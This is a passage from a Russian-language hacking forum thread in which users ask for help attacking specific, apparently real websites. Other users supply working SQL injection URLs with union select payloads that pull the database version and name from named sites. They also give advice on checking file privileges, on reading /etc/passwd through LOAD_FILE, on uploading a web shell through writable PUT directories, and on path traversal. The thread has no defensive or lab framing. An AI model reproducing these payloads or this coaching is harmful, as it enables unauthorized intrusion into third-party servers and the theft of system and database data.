Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3,4,5,6,7,8--
    Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
     
  2. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
     
  3. Stradi

    Stradi Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    78
    Likes Received:
    31
    Reputations:
    5
    Мм... Дайте почитать что-нибудь о PUT, TRACE и WRITE методах.
    Или подскажите... Есть сайт, у него корень со всеми этими параметрами... Как мне загрузить туда шелл, etc.?
    Спасибо...
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Stradi , тоесть нам нужно поискать в гугле и выложить тебе готовые линки? Или как?
    Ты считаешь это вопрос по уязвимостям?

    ГУГЛ:
    RFC 2068
    http://lib.misto.kiev.ua/WEBMASTER/rfc2068/rfc2068rus.txt

    Если что-то ещё найти, обращайтесь, но сначала лучше попытаться сдесь:
    Жмах
     
    #5484 Kakoytoxaker, 19 Feb 2009
    Last edited: 19 Feb 2009
  5. Stradi

    Stradi Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    78
    Likes Received:
    31
    Reputations:
    5
    Спасибо конечно... Я и сам знаю, что такое гугль о_О
    Я имел ввиду что вы мне можете посоветовать, ибо я не в курсе, как правильно поставить вопрос гуглю по этому поводу...
    Я к тому - что можно получить с этих параметров... А не прошу учить пользоваться поисковой системой... Вот...
     
  6. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Если тебе такое выдал XSpider, то можешь забыть об этой ерунде
     
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Stradi, как ты узнал, что они включены для корня сайта? С помощью OPTIONS? Так он говорит какие методы сервер потенциально поддержвает, но по умолчанию они отключены, а если и включены, то регулируются айпишники с помощью .htaccess.
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Stradi Вопрос некорректен, складывается впечатление, что ты сам не до конца понимаешь, что тебе нужно. Я полагаю, ты отсканировал какой-то ресурс иксспайдером и сканер выдал тебе что-то типо "доступен метод TRACE".
    Это не параметры, это методы запроса и для того, что-бы тебе разобраться я привёл линк, который лучше прочесть, а затем, исходя из прочитанного уже задавать вопросы
     
  9. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Stradi,

    http://www.xakep.ru/post/17540/default.asp
    http://www.inattack.ru/article/516.html Пункт 3
     
  10. Stradi

    Stradi Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    78
    Likes Received:
    31
    Reputations:
    5
    А разве я где-то писал что похож на специалиста по сетевой безопасности?

    Сканировал вовсем не XSpider'ом, тоже сканер, но...
    Directories with WRITE permissions enabled
    Vulnerability description
    Web Scanner was able to create a test file in this directory using the PUT method. The name of the file created is Test_File.txt. You should remove this file after setting proper permissions.
    Вуаля, файл там есть. Я просто хочу понять, каким образом все это происходит, и всё...
     
  11. Stradi

    Stradi Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    78
    Likes Received:
    31
    Reputations:
    5
    Спасибо...
     
  12. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Привет всем ! :)
    объясните пожалуйста как происходит пхп иньекция, с чего начать . Вот допустим есть сайт и что дальше то делать? многое прочитал только каша в голове получилась не пойму как вот узнать на пример сколько нужно поставить слешей с точками ../../../../
    откуда берется их количество? или все методом подбора?
    кто ни будь может поэтапно объяснить на каком ни будь простеньком примере?
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    joomler
    https://forum.antichat.ru/thread23501.html
    https://forum.antichat.ru/thread12123.html
    https://forum.antichat.ru/thread91807.html

    "Слешей с точками" :) много не бывает, выше корня не поднимишься, остальное в статьях, лучше не объяснить, там всё расписано
     
    #5493 Kakoytoxaker, 19 Feb 2009
    Last edited: 19 Feb 2009
  14. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    Возможно ли раскрутить скуль http://scooter-club.ru/index.php?content=yes&page_id=49' ?
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    u36a,

    Code:
    http://scooter-club.ru/index.php?content=yes&page_id=-49+union+select+1,version()/*
     
    _________________________
    1 person likes this.
  16. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    http://scooter-club.ru/index.php?content=yes&page_id=-1+union+select+1,database()+/*
     
    4 people like this.
  17. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    А есть ли возможность посмотреть присутствует ли file_priv у данного пользователя?
     
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    если доступа к mysql.user нет - то скорей всего file_priv нет. А если есть доступ то запрашиваешь колонку file_priv из таблицы mysql.user - если Y -то есть, если N - то нет
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    u36a, возможность есть. в твоем случает file_priv не присутствует :)
    https://forum.antichat.ru/showpost.php?p=942609&postcount=34
    вот тут все описано, не буду цитировать.
     
    _________________________
    #5499 yarbabin, 19 Feb 2009
    Last edited: 19 Feb 2009
  20. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    u36a, сделай в поле вывода LOAD_FILE('/etc/passwd') если сервак юниксовый... при наличии файлприва получишь содержимое, при отсутствии - или пустоту или ошибки... Ну в общем вывода не будет...
     
Thread Status:
Not open for further replies.